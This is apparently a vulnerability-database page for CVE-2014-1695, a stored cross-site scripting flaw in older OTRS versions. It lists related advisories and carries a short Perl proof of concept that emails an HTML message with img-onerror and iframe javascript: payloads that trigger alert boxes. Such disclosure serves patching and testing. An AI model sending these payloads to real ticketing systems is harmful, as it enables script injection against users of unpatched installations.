| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS) Vulnerability | 27 Apr 201500:00 | – | zdt | |
| otrs -- XSS Issue | 25 Feb 201400:00 | – | freebsd | |
| CVE-2014-1695 | 28 Feb 201417:00 | – | cve | |
| CVE-2014-1695 | 28 Feb 201417:00 | – | cvelist | |
| [SECURITY] [DLA 1119-1] otrs2 security update | 30 Sep 201719:35 | – | debian | |
| CVE-2014-1695 | 28 Feb 201417:00 | – | debiancve | |
| Debian DLA-1119-1 : otrs2 security update | 2 Oct 201700:00 | – | nessus | |
| FreeBSD : otrs -- XSS Issue (70b72a52-9e54-11e3-babe-60a44c524f57) | 26 Feb 201400:00 | – | nessus | |
| Mandriva Linux Security Advisory : otrs (MDVSA-2014:054) | 14 Mar 201400:00 | – | nessus | |
| openSUSE Security Update : otrs (openSUSE-SU-2014:0360-1) | 13 Jun 201400:00 | – | nessus |
# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
# Date: 28.01.2014
# Exploit Author: Adam Ziaja http://adamziaja.com
# Vendor Homepage: https://www.otrs.com
# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
# CVE : CVE-2014-1695
#!/usr/bin/perl -w
use strict;
use MIME::Lite;
my $msg = MIME::Lite->new(
Subject => 'OTRS XSS PoC',
From => '[email protected]',
To => '[email protected]',
Type => 'text/html',
Data =>
'<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe
src=javascript:alert(\'XSS2\') ></body></html>'
);
$msg->send();Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation